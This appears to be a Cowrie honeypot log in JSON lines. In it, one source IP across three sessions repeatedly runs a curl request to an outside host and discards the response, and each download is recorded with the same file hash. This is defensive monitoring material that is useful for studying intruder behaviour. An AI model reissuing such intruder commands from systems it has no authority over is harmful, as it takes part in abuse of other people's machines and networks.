{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.742046Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.745433Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.773808Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.775064Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.775564Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.778312Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.778743Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.779861Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.780274Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.814469Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.816204Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.817817Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.819177Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.819974Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.822515Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.823537Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.824856Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.825538Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.831037Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.882744Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.884354Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.885288Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.885931Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.887642Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.888193Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.889698Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.890217Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.928356Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.929794Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.930288Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.931824Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.932696Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.934542Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.935357Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.939258Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.942040Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.944347Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.970259Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.972206Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.974766Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.976179Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.976703Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.981157Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.981964Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.983422Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.984004Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.017887Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.018975Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.022465Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.024742Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.025259Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.029277Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.030079Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.033357Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.058213Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.060203Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.063078Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.063804Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.065663Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.066255Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.067777Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.068271Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.099609Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.101369Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.102115Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.102515Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.105576Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.106725Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.107536Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.109164Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.109831Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.143858Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.145427Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.146587Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.147372Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.148654Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.149430Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.151293Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.152008Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.155702Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.157261Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
